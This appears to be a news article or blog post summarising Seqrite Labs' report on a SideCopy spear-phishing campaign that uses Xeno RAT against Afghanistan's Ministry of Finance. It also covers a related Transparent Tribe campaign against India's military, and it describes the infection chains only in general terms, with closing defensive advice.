Cybersecurity researchers have uncovered a sophisticated spear-phishing campaign attributed to the Pakistan-linked threat group SideCopy, targeting Afghanistan’s Ministry of Finance and other government institutions. The attackers are deploying an open-source remote access trojan (RAT) known as Xeno RAT to compromise systems and gain unauthorized access to sensitive information.
Operation XENOFISCAL: A Targeted Cyber Espionage Campaign
According to researchers at Seqrite Labs, the campaign—dubbed Operation XENOFISCAL—begins with a carefully crafted spear-phishing email containing a ZIP archive. Inside the archive is a malicious Windows Shortcut (LNK) file disguised with a Pashto-language filename designed to appear legitimate to Afghan government personnel.
The operation primarily targets:
- Afghanistan’s Ministry of Finance
- Provincial revenue and finance directorates
- Pashto-speaking government officials
- Provincial-level government employees
The use of Pashto, one of Afghanistan’s primary official languages, highlights the attackers’ understanding of the local environment and their effort to increase the likelihood of successful compromise.
SideCopy’s Expanding Threat Landscape
SideCopy is a Pakistan-aligned cyber threat group operating under the broader Transparent Tribe (APT36) umbrella. The group has a history of conducting espionage-focused cyber operations across South Asia and is known for deploying multiple malware families to steal sensitive information.
Earlier in 2025, security researchers linked SideCopy to attacks against Indian organizations using malware such as Xeno RAT, Spark RAT, and CurlBack RAT. The latest campaign against Afghan government entities appears to be part of the group’s ongoing efforts to expand its regional cyber espionage activities.
How the Attack Works
The infection chain begins when a victim executes the malicious LNK file. The shortcut abuses the legitimate Windows utility mshta.exe to retrieve a remote HTML Application (HTA) hosted on a compromised Afghan educational website.
Once downloaded, the HTA executes heavily obfuscated JavaScript directly in memory, helping the attackers evade detection.
The malware then:
- Establishes persistence through Windows Registry modifications.
- Masquerades as Microsoft Edge components.
- Deploys a DLL-based loader.
- Installs Xeno RAT version 1.8.7.
- Displays a decoy document to distract the victim and reduce suspicion.
Xeno RAT Capabilities
Xeno RAT is a powerful remote access trojan that communicates with attacker-controlled servers over TCP connections. It provides threat actors with extensive control over infected systems.
Key capabilities include:
- Executing commands remotely
- Loading and running external DLL modules
- File management and data exfiltration
- Scheduled task creation for persistence
- Antivirus reconnaissance
- SOCKS5 proxy-based network tunneling
- Keystroke logging
- Screenshot capture
- Clipboard monitoring
- Webcam and microphone surveillance
- Removal of persistence mechanisms
- Self-uninstallation to erase traces of infection
These features make Xeno RAT a versatile tool for long-term surveillance and intelligence-gathering operations.
Related Transparent Tribe Activity Targets Indian Military
The disclosure comes amid reports of another targeted phishing campaign linked to Transparent Tribe, this time aimed at India’s military and defense ecosystem.
Researchers discovered that attackers were using malicious Linux .desktop files disguised as contract-related documents connected to armored vehicle procurement projects. The campaign reportedly relied on WhatsApp-based social engineering tactics to lure victims into opening the malicious files.
Once executed, the infected launcher initiated a complex, multi-stage infection chain involving obfuscated shell scripts and the deployment of a Golang-based malware implant dubbed DeskRAT.
Security analysts believe the campaign was specifically designed to target individuals associated with India’s military infrastructure and defense procurement operations.
Growing Cyber Tensions in South Asia
The latest findings underscore the increasing sophistication of cyber espionage campaigns across South Asia. Threat actors are leveraging localized social engineering tactics, region-specific language lures, and advanced malware frameworks to infiltrate government and defense organizations.
As groups such as SideCopy and Transparent Tribe continue refining their tactics, organizations in the region must remain vigilant by strengthening email security, implementing endpoint detection solutions, and conducting regular cybersecurity awareness training to mitigate the risks posed by targeted phishing attacks.
What stood out to me is how the attackers tailored the campaign with Pashto-language lures and disguised LNK files, which shows a strong focus on social engineering rather than just technical exploitation. For organizations in similar environments, this is a good reminder that monitoring shortcut-file attachments and reinforcing phishing awareness can be just as important as traditional malware defenses.